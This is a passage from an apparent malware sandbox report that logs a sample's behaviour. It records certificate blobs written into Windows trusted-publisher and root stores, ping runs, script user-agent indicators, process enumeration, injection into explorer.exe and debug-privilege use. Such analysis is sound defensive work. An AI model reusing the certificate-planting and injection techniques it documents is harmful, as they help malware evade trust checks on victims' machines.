\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA nrl0jkg334t.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Full Program Features.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Full Program Features.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Full Program Features.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B nrl0jkg334t.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 nrl0jkg334t.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f nrl0jkg334t.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC nrl0jkg334t.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be nrl0jkg334t.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp -
Runs ping.exe 1 TTPs 5 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 5140 PING.EXE 6456 PING.EXE 4476 PING.EXE 7528 PING.EXE 9608 PING.EXE -
Script User-Agent 27 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 146 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 186 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 542 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 141 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 375 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 432 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 466 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 469 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 490 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 493 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 499 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 355 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 551 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 350 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 368 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 492 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 510 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 140 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 215 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 496 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 425 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 367 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 193 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 233 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 240 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 353 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 473 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exesvchost.exerundll32.exesetups.tmpprolab.tmpjfiag3g_gg.exeirecord.tmpmultitimer.exeGetupycore.exepid process 4672 rundll32.exe 4672 rundll32.exe 3632 svchost.exe 3632 svchost.exe 5112 rundll32.exe 5112 rundll32.exe 4228 setups.tmp 4228 setups.tmp 4264 prolab.tmp 4264 prolab.tmp 504 jfiag3g_gg.exe 504 jfiag3g_gg.exe 4392 irecord.tmp 4392 irecord.tmp 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 4928 multitimer.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe 1128 Getupycore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3044 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
toolspab1.exetoolspab1.exeexplorer.exeexplorer.exeexplorer.exepid process 5296 toolspab1.exe 6116 toolspab1.exe 5560 5560 5560 5560 3044 3044 3044 3044 3044 3044 3044 3044 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 3044 3044 3044 3044 1656 explorer.exe 1656 explorer.exe 5896 explorer.exe 5896 explorer.exe 5896 explorer.exe 5896 explorer.exe 5896 explorer.exe 5896 explorer.exe 5896 explorer.exe 5896 explorer.exe 3044 3044 3044 3044 5380 explorer.exe 5380 explorer.exe 5380 explorer.exe 5380 explorer.exe 5380 explorer.exe 5380 explorer.exe 5380 explorer.exe 5380 explorer.exe 1656 explorer.exe 1656 explorer.exe 3044 3044 5896 explorer.exe 5896 explorer.exe 5380 explorer.exe 5380 explorer.exe 1656 explorer.exe 1656 explorer.exe 5380 explorer.exe 5380 explorer.exe 5896 explorer.exe 5896 explorer.exe 1656 explorer.exe 1656 explorer.exe 5380 explorer.exe 5380 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Three.exeHookSetp.exeMicrosoft.exeppppppfy.exerundll32.exesvchost.exerundll32.exemultitimer.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3200 Three.exe Token: SeDebugPrivilege 2976 HookSetp.exe Token: SeDebugPrivilege 4220 Microsoft.exe Token: SeDebugPrivilege 4248 ppppppfy.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeTcbPrivilege 3632 svchost.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 4672 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 5112 rundll32.exe Token: SeDebugPrivilege 4928 